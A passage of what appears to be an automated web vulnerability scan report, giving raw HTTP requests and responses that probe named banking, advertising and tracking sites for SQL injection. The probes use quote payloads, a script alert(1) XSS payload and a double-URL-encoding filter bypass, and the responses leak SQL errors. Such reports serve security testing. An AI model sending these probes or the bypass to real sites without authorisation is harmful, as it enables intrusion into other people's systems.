X-XSS-Protection: 1; mode=block
Content-Length: 22017

{

var google_ads = new Array();
var google_ad;
var google_radlinks = new Array();
var google_radlink;
var google_info = new Object();
google_ad = new Object();
google_ad.n = 1;
google_ad.type = "te
...[SNIP]...
freedom_js&adurl=http://web.investinganswers.com/land/is-your-bank-in-danger.asp%3FTP%3D988%26ref%3DGAW";
google_ad.visible_url = "www.InvestingAnswers.com";
google_ad.line1 = "Next 442 Banks to Fail";
google_ad.line2 = "If you invest in any of these banks";
google_ad.line3 = "your portfolio could be at risk.";
google_ad.regionname = "";
google_ads[11] = google_ad;
google_ad = new Object();

...[SNIP]...

Request 2

GET /pagead/ads?client=ca-freedom_js&output=js&image_size=300x250&lmt=1296771806&num_ads=4%2527%2527&channel=foci%2Cocregister%2Cblogs&ad_type=text%2Cimage&adtest=off&ea=0&oe=utf8&flash=10.1.103&hl=en&url=http%3A%2F%2Fmortgage.ocregister.com%2Ffeeda71cd%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E1f35e8c0ea2%2F&adsafe=high&dt=1296750718575&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296750719074&frm=0&adk=1151042365&ga_vid=721383.1296750720&ga_sid=1296750720&ga_hid=467942346&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1021&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F49&fu=0&ifi=1&dtd=937 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response 2

1.13. http://onlinecheckingservice.info/ [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://onlinecheckingservice.info
Path:	/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?keyword=online%20banking?adid=640302&2176b HTTP/1.1
Host: onlinecheckingservice.info
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:11:11 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=5b6ad2d30bfa9cc8e795c72f77003b3c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '4e0ad77cb542c55bcfdd77462f667921','')' at line 1

Request 2

GET /?keyword=online%20banking?adid=640302&2176b HTTP/1.1
Host: onlinecheckingservice.info
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:11:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=6954561df05c553ab71f6ad6a5825016; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.14. http://onlinecheckingservice.info/ [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://onlinecheckingservice.info
Path:	/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET / HTTP/1.1
Host: onlinecheckingservice.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: PHPSESSID=e83099de7fd34c36646b75e034957a18;

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:11:02 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://easycheckingbanking.com/?keyword=online%20banking?adid=640302&2176b%22%3E' at line 1

Request 2

GET / HTTP/1.1
Host: onlinecheckingservice.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: PHPSESSID=e83099de7fd34c36646b75e034957a18;

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:11:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.15. http://onlinecheckingservice.info/click.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://onlinecheckingservice.info
Path:	/click.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /click.php HTTP/1.1
Host: onlinecheckingservice.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: PHPSESSID=e83099de7fd34c36646b75e034957a18;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:11:11 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://easycheckingbanking.com/?keyword=online%20banking?adid=640302&2176b%22%3E' at line 1

Request 2

GET /click.php HTTP/1.1
Host: onlinecheckingservice.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: PHPSESSID=e83099de7fd34c36646b75e034957a18;

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:11:13 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.16. http://onlinecheckingservices.com/ [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://onlinecheckingservices.com
Path:	/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?keyword=online%20banking?adid=640302 HTTP/1.1
Host: onlinecheckingservices.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:44:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d53b4c2e22da087a061fa3937ec50bc3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '83634f130adab22995c04d58b584f143','')' at line 1

Request 2

GET /?keyword=online%20banking?adid=640302 HTTP/1.1
Host: onlinecheckingservices.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:44:32 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=bdfeb3cb8731d3376925db9015e274e2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.17. http://onlinecheckingservices.com/ [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://onlinecheckingservices.com
Path:	/

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?keyword=online%20banking?adid=640302 HTTP/1.1
Host: onlinecheckingservices.com
Proxy-Connection: keep-alive
Referer: http://easycheckingbanking.com/?keyword=online%20banking?adid=640302
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:44:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=e81ceb7ad27cb50ba206cb58fd737806; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://easycheckingbanking.com/?keyword=online%20banking?adid=640302','','','12b' at line 1

Request 2

GET /?keyword=online%20banking?adid=640302 HTTP/1.1
Host: onlinecheckingservices.com
Proxy-Connection: keep-alive
Referer: http://easycheckingbanking.com/?keyword=online%20banking?adid=640302
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:44:30 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=9f6e140adf319a893681727ddae24a7e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.18. http://onlinecheckingservices.com/click.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://onlinecheckingservices.com
Path:	/click.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /click.php HTTP/1.1
Host: onlinecheckingservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: PHPSESSID=7a0356165d342edcae7eda14f1f87c45;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
</html>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://easycheckingbanking.com/?keyword=f6ebd%22%3E%3Cscript%3Ealert(1)%3C/scrip' at line 1

Request 2

GET /click.php HTTP/1.1
Host: onlinecheckingservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: PHPSESSID=7a0356165d342edcae7eda14f1f87c45;

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...

1.19. http://s1.srtk.net/www/delivery/rd.php [trackerid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://s1.srtk.net
Path:	/www/delivery/rd.php

Issue detail

The trackerid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the trackerid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /www/delivery/rd.php?bannerid=372&trackerid=977'&SR=sr3_43119753_ms&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B232825021%3B56698875%3Bs%3Fhttp%3A%2F%2Fwww.us.hsbc.com%2F1%2F2%2F3%2Fhsbcpremier%2Fprom%2Fnov-10%3Fcode%3DPMD0006263%26WT.srch%3D1%26WT.mc_id%3DHBUS_PMD0006263 HTTP/1.1
Host: s1.srtk.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:23:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://s1.srtk.net/w3c/s1.xml", CP="NON IVAa HISa OTPa OUR DELa IND UNI PUR COM NAV INT"
Set-Cookie: MAXID=09a658fc5598e50915c9b50e2e89034e; expires=Fri, 03-Feb-2012 16:23:53 GMT; path=/
location: http://ad.doubleclick.net/clk;232825021;56698875;s?http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263
Content-Length: 288
Connection: close
Content-Type: application/x-javascript

SELECT v.variableid AS variable_id,v.trackerid AS tracker_id,v.name AS name,v.datatype AS type FROM variables AS v WHERE v.trackerid=977\'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

1.20. http://urlwww--feedzilla--com.rtrk.com/tools/hcc.asp [RlocalTiming cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://urlwww--feedzilla--com.rtrk.com
Path:	/tools/hcc.asp

Issue detail

The RlocalTiming cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the RlocalTiming cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the RlocalTiming cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /tools/hcc.asp HTTP/1.1
Host: urlwww--feedzilla--com.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDQCDCDQCR=KKONDDMAPCJFKFHFKCMFFNMK; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7b45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalDYNPX=RLDYNPX%3Dwww.feedzilla.com; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1%2527; RlocalHilite=kw_hilite_off%3D0; RlocalPROXYLog=RLPROXYLog%3d0;

Response 1

HTTP/1.1 502 Proxy Error
Date: Thu, 03 Feb 2011 17:24:16 GMT
X-RL-Host: pweb106
X-Robots-Tag: noindex,nofollow
Vary: Accept-Encoding
Content-Length: 534
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:53:58 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>502 Proxy Error</title>
</head><body>
<h1>Proxy Error</h1>
<p>The proxy server received an invalid
response from an upstream server.<br />
...[SNIP]...

Request 2

GET /tools/hcc.asp HTTP/1.1
Host: urlwww--feedzilla--com.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDQCDCDQCR=KKONDDMAPCJFKFHFKCMFFNMK; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7b45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalDYNPX=RLDYNPX%3Dwww.feedzilla.com; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1%2527%2527; RlocalHilite=kw_hilite_off%3D0; RlocalPROXYLog=RLPROXYLog%3d0;

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:25:56 GMT
Server: Microsoft-IIS/6.0
X-RL-Host: pweb106
X-Robots-Tag: noindex,nofollow
Set-Cookie: RlocalPROXYLog=RLPROXYLog%3d1; domain=.rtrk.com; path=/
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 03 Feb 2011 17:24:53 GMT
Cache-control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:54:37 GMT;path=/;httponly

1.21. http://www.bbt.com/bbt/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /bbt'/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:43 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/ HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
